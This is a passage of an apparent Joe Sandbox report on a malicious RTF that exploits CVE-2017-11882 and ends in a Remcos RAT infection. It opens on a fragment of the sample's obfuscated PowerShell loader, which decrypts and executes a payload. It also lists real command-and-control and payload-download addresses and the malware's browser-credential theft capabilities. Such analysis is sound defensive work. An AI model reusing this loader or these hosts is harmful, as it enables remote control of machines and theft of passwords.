16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni87355924191917571657221755980918cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cniunstmxui0hgfw3fdm1ert/tun0ubdloiqyhjlmxqihnecjctgq65plkspfurkcdrjeph4ihki2ib6ldmk9phm3xxkeni+fcksxpwgqqchotbxmi5gehoxzdilkulsmhsrgtrat4hlirjclijfhhppopad8wrrnjoaupibq8ljkcbyxn79xvshb07yd11fez/xbrm4eb0d6odjgtxhylrzf6j4efba9grgmdc4tkwy2zlmyr0bfez+txcikx6moawodsdqcjz8w7gbp0wx7cdbpibhixab4r+prvgaccg+0+3uep7n/ketdvanulujk7wm0vfcbyd/wvrtzf4youzwmoc3oacf/jrshl+say08x0qppscnvwz86ojjuoepgjsv67aspbpc+mt7exhdg3nzcev9ovnfyyq2mja+oyhp/f7vijb0t7gbdynwme4hifbgrkzkghh0vlgzbfsozqmmnyatrwwng1stwukeon1tmwo+gg02ry5xyl9dvsfohoro3yjn0n+knyfsitsld8vprgssvo3vdtrx83pc61aekuwgmokozlk3nzebypc+p8jh/rc5lwja5zr77tsv/3ml20f7os9kdmcybjegjeqbi2go74vj2welc1ow7mmkvohzmjpl4lbdccde3+rcmbilqbycalcm5aunss21ha2+mb9sy0fop8ez4uefmsux1rlq2l4c8nimjoagijgqysi/8/4pvnnd/sdhqf9jv/rjy+djdtvgcjd3eg+777e0i3zy2wwu4edo5corcrrao0qh5kucez0fy+pfnv3ycp5njlg3ee0phzw6smpaer25mwo6sdwnn/dbc6kjxcnudmbo0nsge1naamlvsvxyb09sotlfoqfki1htvgxntwgomcwso9fqjz6v2g6lgaw0fsjkoc9ekynuz2i6adevqhjebtb0xhr2feqyelq/pzpkskekgit2hk3lviwcmienjwqnjfen61s15yu2edgjit9mn3n8vslm2edkyhvsdcmrf7gu/p8wb6oknxnhosycbbbfwxbrtzltr07jaiq87pigqkxkltip+st5jln1rkhuvinakangwfm28rb84mkuqgixbyiubzntatp97cvhahwn4pxpi1kez7/kbaddkxcvvkn3tk4hlxc8ot+rpc8cczkwpzacgoszxk3wprlhnyjtq6zn0qe6sroqcie3ffggvicerreowxqvbpiw9usza17osc636m5zxstoqghiyakm/ddk+whfmdjgisve2wrgdtoq0qt+tggtb9bi3fkjgvpbcuwm1jpuhv/lpydidnqeldtlskziqiivm6lt/byy7al9k4rbqb6ijepuxyhndju46lxfgrasgd2xga6ahtgriacii6eaxgjsunerp5ivok6tfqctmutwbb720zk5bpukq==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crepJump to behavior
                Source: RegAsm.exe, 00000008.00000002.879647352.00000000008CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChrome Mode] - Microsoft Wordsilogf
                Source: RegAsm.exe, 00000008.00000002.879647352.00000000008CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerLX\
                Source: RegAsm.exe, 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: RegAsm.exe, 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp, logs.dat.8.drBinary or memory string: [Program Manager]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434C52 cpuid 8_2_00434C52
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00452036
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_004520C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_00452313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00448404
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_0045243C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_00452543
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00452610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,8_2_0040F8D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_004488ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,8_2_00451CD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00451F50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00451F9B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00448957 GetSystemTimeAsFileTime,8_2_00448957
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041B60D GetUserNameW,8_2_0041B60D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_00449190
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879945414.0000000000DFE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data8_2_0040BA12
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\8_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db8_2_0040BB30

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-9R4HLXJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879945414.0000000000DFE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe8_2_0040569A

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information121
                Scripting                		Valid Accounts1
                Native API                		121
                Scripting                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		13
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts53
                Exploitation for Client Execution                		1
                DLL Side-Loading                		1
                Bypass User Account Control                		2
                Obfuscated Files or Information                		211
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol211
                Input Capture                		2
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts221
                Command and Scripting Interpreter                		1
                Windows Service                		1
                Access Token Manipulation                		1
                DLL Side-Loading                		2
                Credentials In Files                		1
                System Service Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution                		Login Hook1
                Windows Service                		1
                Bypass User Account Control                		NTDS3
                File and Directory Discovery                		Distributed Component Object ModelInput Capture1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell                		Network Logon Script222
                Process Injection                		1
                Masquerading                		LSA Secrets34
                System Information Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion                		Cached Domain Credentials2
                Security Software Discovery                		VNCGUI Input Capture212
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation                		DCSync21
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
                Process Injection                		Proc Filesystem3
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                Remote System Discovery                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1484115 Sample: 4vzwJTZbwT.rtf Startdate: 29/07/2024 Architecture: WINDOWS Score: 100 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Antivirus detection for URL or domain 2->63 65 22 other signatures 2->65 9 WINWORD.EXE 336 17 2->9         started        process3 file4 29 C:\Users\...\~WRD0000.tmp:Zone.Identifier, ASCII 9->29 dropped 31 C:\Users\user\Desktop\~WRD0000.tmp, Rich 9->31 dropped 33 C:\Users\user\Desktop\4vzwJTZbwT.rtf (copy), Rich 9->33 dropped 35 ~WRF{1F49877E-68B7...1-09D774B073D0}.tmp, Composite 9->35 dropped 12 EQNEDT32.EXE 12 9->12         started        process5 dnsIp6 49 172.245.123.11, 49163, 49165, 80 AS-COLOCROSSINGUS United States 12->49 39 C:\...\weseethesimplethingsalwaystog.vBS, Unicode 12->39 dropped 83 Office equation editor establishes network connection 12->83 85 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->85 17 wscript.exe 1 12->17         started        file7 signatures8 process9 signatures10 51 Suspicious powershell command line found 17->51 53 Wscript starts Powershell (via cmd or directly) 17->53 55 Obfuscated command line found 17->55 57 3 other signatures 17->57 20 powershell.exe 12 5 17->20         started        process11 dnsIp12 41 198.46.176.133, 49164, 80 AS-COLOCROSSINGUS United States 20->41 67 Writes to foreign memory regions 20->67 69 Suspicious execution chain found 20->69 71 Injects a PE file into a foreign processes 20->71 24 RegAsm.exe 3 13 20->24         started        signatures13 process14 dnsIp15 43 tochisglobal.ddns.net 24->43 45 tochisglobal.ddns.net 103.253.17.222, 49166, 6426 WIFIKU-AS-IDPTWifikuIndonesiaID unknown 24->45 47 geoplugin.net 178.237.33.50, 49167, 80 ATOM86-ASATOM86NL Netherlands 24->47 37 C:\ProgramData\remcos\logs.dat, data 24->37 dropped 73 Contains functionality to bypass UAC (CMSTPLUA) 24->73 75 Detected Remcos RAT 24->75 77 Contains functionality to steal Chrome passwords or cookies 24->77 81 4 other signatures 24->81 file16 79 Uses dynamic DNS services 43->79 signatures17

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                4vzwJTZbwT.rtf50%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                4vzwJTZbwT.rtf100%AviraHEUR/Rtf.Malformed

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1F49877E-68B7-4001-A271-09D774B073D0}.tmp100%AviraEXP/CVE-2017-11882.Gen
                C:\Users\user\Desktop\~WRD0000.tmp100%AviraEXP/CVE-2017-11882.Gen

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://geoplugin.net/json.gp0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://geoplugin.net/json.gp/C0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://go.micro0%Avira URL Cloudsafe
                http://172.245.123.11/47/BEN.txt0%Avira URL Cloudsafe
                http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIF100%Avira URL Cloudmalware
                http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIFj0%Avira URL Cloudsafe
                tochisglobal.ddns.net0%Avira URL Cloudsafe
                http://198.46.176.133/Upload/vbs.jpeg100%Avira URL Cloudmalware
                http://172.245.123.110%Avira URL Cloudsafe
                http://198.46.176.1330%Avira URL Cloudsafe
                http://go.microsofy0%Avira URL Cloudsafe
                http://geoplugin.net/json.gp9k0%Avira URL Cloudsafe
                http://go.micros=0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                tochisglobal.ddns.net
                		103.253.17.222
                		truetrue
                  		unknown
                  geoplugin.net
                  		178.237.33.50
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gpfalse
                    • URL Reputation: safe
                    		unknown
                    http://172.245.123.11/47/BEN.txttrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://198.46.176.133/Upload/vbs.jpegfalse
                    • Avira URL Cloud: malware
                    		unknown
                    tochisglobal.ddns.nettrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIFtrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://go.micropowershell.exe, 00000006.00000002.374984057.0000000005101000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://geoplugin.net/json.gp/Cpowershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://172.245.123.11powershell.exe, 00000006.00000002.377227143.0000000009331000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIFjEQNEDT32.EXE, 00000002.00000002.357699051.00000000008DF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://geoplugin.net/json.gp9kRegAsm.exe, 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://go.microsofypowershell.exe, 00000006.00000002.374984057.0000000005101000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.373509848.0000000002581000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://198.46.176.133powershell.exe, 00000006.00000002.373509848.00000000026BB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://go.micros=powershell.exe, 00000006.00000002.374984057.0000000005101000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    198.46.176.133
                    		unknownUnited States
                    		36352AS-COLOCROSSINGUSfalse
                    103.253.17.222
                    		tochisglobal.ddns.netunknown
                    		59139WIFIKU-AS-IDPTWifikuIndonesiaIDtrue
                    178.237.33.50
                    		geoplugin.netNetherlands
                    		8455ATOM86-ASATOM86NLfalse
                    172.245.123.11
                    		unknownUnited States
                    		36352AS-COLOCROSSINGUStrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1484115
                    Start date and time:2024-07-29 16:14:10 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 5s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:12
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:4vzwJTZbwT.rtf
                    renamed because original name is a hash value
                    Original Sample Name:7279ab0fbc0a02d8b6966ed3cdf67aca.rtf
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winRTF@8/18@2/4
                    EGA Information:
                    • Successful, ratio: 66.7%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 70
                    • Number of non-executed functions: 194
                    Cookbook Comments:
                    • Found application associated with file extension: .rtf
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    • Override analysis time to 79366.7789945727 for current running targets taking high CPU consumption
                    • Override analysis time to 158733.557989145 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 2644 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: 4vzwJTZbwT.rtf

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    10:15:00API Interceptor80x Sleep call for process: EQNEDT32.EXE modified
                    10:15:04API Interceptor23x Sleep call for process: wscript.exe modified
                    10:15:05API Interceptor22x Sleep call for process: powershell.exe modified
                    10:15:12API Interceptor9930893x Sleep call for process: RegAsm.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    198.46.176.133NySTAwCpzK.rtfGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    PI-002312.xlsGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    SATIN ALMA EMR#U0130.xlsGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    Purchase order.xlsGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    createdthingstobefrankwithmeeverywhere.gIF.vbsGet hashmaliciousGuLoader, RemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    createactiveimagesbeautygirlfrnd.gIF.vbsGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    screensimplethingstohandlecream.gIF.vbsGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    creatednewwaterbottleforme.gIF.vbsGet hashmaliciousUnknownBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    IFqsFpijFt.rtfGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    103.253.17.222PI-002312.xlsGet hashmaliciousRemcosBrowse
                      Purchase Order.exeGet hashmaliciousGuLoader, RemcosBrowse
                        JPEG00774533.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          CamScanner0091.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            PI00232.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                              178.237.33.5017222595947848c557577cb7231356008886f5096f576098b0877ccefa60e0124d9938bde0501.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              NySTAwCpzK.rtfGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              PI-002312.xlsGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              SATIN ALMA EMR#U0130.xlsGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              Purchase order.xlsGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              17222151664c1cf157f4e60a5db7bff76e80474d27d5be3b770f3ff1dd50ca91ddde2e4170122.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              SKqrekfUiW.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              createdthingstobefrankwithmeeverywhere.gIF.vbsGet hashmaliciousGuLoader, RemcosBrowse
                              • geoplugin.net/json.gp
                              createactiveimagesbeautygirlfrnd.gIF.vbsGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              screensimplethingstohandlecream.gIF.vbsGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              tochisglobal.ddns.netPI-002312.xlsGet hashmaliciousRemcosBrowse
                              • 103.253.17.222
                              Purchase Order.exeGet hashmaliciousGuLoader, RemcosBrowse
                              • 103.253.17.222
                              JPEG00774533.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                              • 103.253.17.222
                              CamScanner0091.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                              • 103.253.17.222
                              PI00232.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                              • 103.253.17.222
                              geoplugin.net17222595947848c557577cb7231356008886f5096f576098b0877ccefa60e0124d9938bde0501.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              NySTAwCpzK.rtfGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              PI-002312.xlsGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              SATIN ALMA EMR#U0130.xlsGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              Purchase order.xlsGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              17222151664c1cf157f4e60a5db7bff76e80474d27d5be3b770f3ff1dd50ca91ddde2e4170122.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              SKqrekfUiW.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
